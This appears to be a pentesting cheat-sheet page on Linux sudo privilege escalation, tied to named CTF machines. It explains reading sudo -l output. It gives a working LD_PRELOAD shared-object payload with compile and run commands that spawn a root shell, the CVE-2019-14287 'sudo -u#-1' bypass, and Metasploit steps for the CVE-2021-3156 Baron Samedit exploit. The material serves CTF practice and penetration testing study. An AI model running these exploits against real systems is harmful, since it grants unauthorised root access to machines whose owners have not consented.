sudo privilege escalation

An excellent reference to exploit sudo: SUDO_KILLER (2.0k ⭐). List sudoers with getent group sudo.

linprivesc linuxprivesc commonlinuxprivesc linuxprivilegeescalation picklerick linprivesc wgelctf easyctf colddboxeasy allinonemj chillhack sudo_weak_configuration bash_restricted_shells shared_objects_hijacking nibbles getsimplecms devvortex cozyhosting knife broker busqueda shocker blocky mirai

If you have administrative privileges, you can list them with:

$ sudo -nl # without a password
$ sudo -l # with a password

The first section is about settings and environment variables that may be exploited such as LD_PRELOAD.

Matching Defaults entries for [...]:
    [...] # something here

The second section is about your sudoers rights. Such commands may be exploited to get root, search the command on GTOBins #sudo.

User [...] may run the following commands on [...]:
    (root) /bin/tar

➑️ For instance, the user below can run /bin/tar as root.

πŸ“š Sometimes, instead of root, we may be able to run commands as another user, such as /opt/script.sh as user xxx. Use sudo -u xxx.

πŸ€ Sometimes, patterns are used in commands/paths. In a path, it means we can use ../. In a command, we can use any option.

User [...] may run the following commands on [...]:
    (root) NOPASSWD: /usr/bin/vim
    (ALL) NOPASSWD: /usr/bin/vim
    (xxx) NOPASSWD: /opt/*.sh
    (root) /usr/bin/ssh *
    (ALL : ALL) SETENV: NOPASSWD: /usr/bin/python3

☠️ If you can only execute the script and not read it, either try to see if the script use an injectable parameter or try to find if the source code is available somewhere else (ex: on Git).

⚠️ A configuration may contains both env_keep and env_reset.

LD_PRELOAD

linprivesc linuxprivesc linuxprivilegeescalation

If there is env_keep += LD_PRELOAD in the permissions displayed by sudo -l OR if there is no env_reset, then it means that we can set LD_PRELOAD and run code before executing the command.

The code below replace the gid/uid of the user running the command with 0 (root). Then, it pops a bash shell (as root!).

//#include <stdio.h>
//#include <sys/types.h>
//#include <stdlib.h>
void _init() {
    //unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

Compile it with

$ cd /tmp
$ gcc -shared -fPIC init.c -o init.so
$ gcc -shared -fPIC init.c -o init.so -nostartfiles

Then, call the command that you could run as administrator (tar here), while setting the variable path to your script:

$ sudo LD_PRELOAD=/tmp/init.so tar

πŸ’Ž Congratulations, you are root now!

Well-known Vulnerabilities

sudo before 1.8.28 (CVE-2019-14287)

agentsudoctf

If a user was allowed to run one specific command using sudo, such as tar, then it was possible for any other user to impersonate the authorized user, and run the command as root too.

$ sudo -u#-1 tar [...]
$ sudo -u#4294967295 tar [...]

πŸ’Ž Congratulations, you are root now!

sudo before 1.9.5p2 (CVE-2021-3156)

metasploitframework linuxprivilegeescalation

See metasploit module: exploit/linux/local/sudo_baron_samedit.

msf6> use exploit/linux/local/sudo_baron_samedit
msf6> set SESSION 1
msf6> set LHOST tun0
msf6> run

Additional Notes

LD_LIBRARY_PATH

shared_objects_hijacking

While uncommon, if the sudo configuration include env_keep+=LD_LIBRARY_PATH, we are able to set a custom folder for .so. Refer to Shared Object Hijacking.

$ sudo LD_LIBRARY_PATH=/path/to/xx/ [...]